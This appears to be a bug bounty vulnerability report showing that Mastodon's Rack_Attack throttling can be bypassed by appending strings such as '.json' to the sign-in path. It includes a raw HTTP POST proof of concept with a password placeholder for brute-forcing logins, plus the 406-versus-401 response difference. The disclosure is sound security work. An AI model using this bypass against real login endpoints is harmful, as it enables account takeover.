Mastadon's Misconfigured Rack_Attack.rb Does Not Appropriately Protect Against Brute Force Attacks in mastodon/mastodon
Jun 20th 2022
Mastadon relies on the Rack_Attack.rb file to manage API throttling in the application through the declaration of absolute paths (i.e., /auth/sign_in). By appending random strings of characters to the end of the directory in a POST request it is possible to bypass brute force protections. Tester attempted to file this finding through Intigriti as requested on Github, however it's noted that Intigriti is phasing this project out. Tester utilized the staging.mastodon.social demo application, and also a local installation of the application to confirm the vulnerability.
Tester was able to bypass sign-in restrictions by appending .json behind the directory, however any string is viable. It was possible to identify valid passwords based on a 406 response from the server, versus invalid responses containing a 401 error. Rack_Attack declares a 300 request per 5 minute limit, which appears to be the only appropriate restriction. Provided an attacker maintains less than 300 requests in 5 minutes it is possible to completely bypass all restrictions.
Note that the tester has a proof of concept fix for the issue already and is happy to work with the maintainer to fix it. Tester would ask that a comparable bounty amount be applied by the maintainer as it would be with Intigriti, where the low-end of a valid finding is 1,000 pounds, and a high end finding is 20,000 pounds. Tester would have submitted through Intigriti had it not been for the pending closure of the program unfortunately. Tester does realize that the prize pot is depleted on this platform, and it would be at the discretion of the maintainer to honor a payment or not. Either way, CVE status will be requested due to the severity of the finding.
Proof of Concept
POST /auth/sign_in.json HTTP/1.1 Host: staging.mastodon.social Cookie: _mastodon_session=wM5JZ5uFbag8V81Jk2jWsVES1Gl8dkukxjZdaN%2FnNNHh9UFamiUn62zY8Mh9nR8zu82pD%2FddQndPV8rJTgIiMPppVybkaJ3ULzMmawkADNUvx7q9Lz8vmT0svrnKDfL9MqnQ5YhKEvIq6c3LPBM8O1U%2FT4qQk2FZIoyjc1S1O8kbBBj6eYztCHLDdC25PnZ9%2Fd0IOB2fEW9qDnvNrNzxw77UcgRHjt9GWCw%2BPTh1aBS6J8a9f94ZXf%2BlgE2dCubsH7V5PL8Ijuq1bsePt27q1Pb8TbXzCBaO%2FA%3D%3D--JIrYMu6fwlXhF3%2FU--cSi5lAMp4z2IyeM1WfCzdQ%3D%3D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 187 Origin: https://staging.mastodon.social Dnt: 1 Referer: https://staging.mastodon.social/auth/sign_in Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close authenticity_token=1ItjuEy9z3KwYRBwjKswfJWvwnGXIrnLvn7AT2czIG1jYpaN193lao-RldsgPydOi06hRmp12FXs6zK0jd6sZA&user%5Bemail%5D=themayor%40intigriti.me&user%5Bpassword%5D=§testpasswordhere§&button=
None of the API endpoints noted in the Rack_Attack configuration appear to have appropriate constraints, which would allow comparable brute force attempts against each.
See following link for screenshot with bypass responses and times. https://www.notion.so/themayor/Mastadon-Rack-Attack-7e665d571f4f407286480409594ef916
The impact of this vulnerability is that an attacker can brute force logins or other API calls in the application without threat of throttling or IP blocking.
Tester has a tested proof of concept locally that they are willing to share and provide with the maintainer once conversation has taken place on an appropriate bounty payment, if applicable.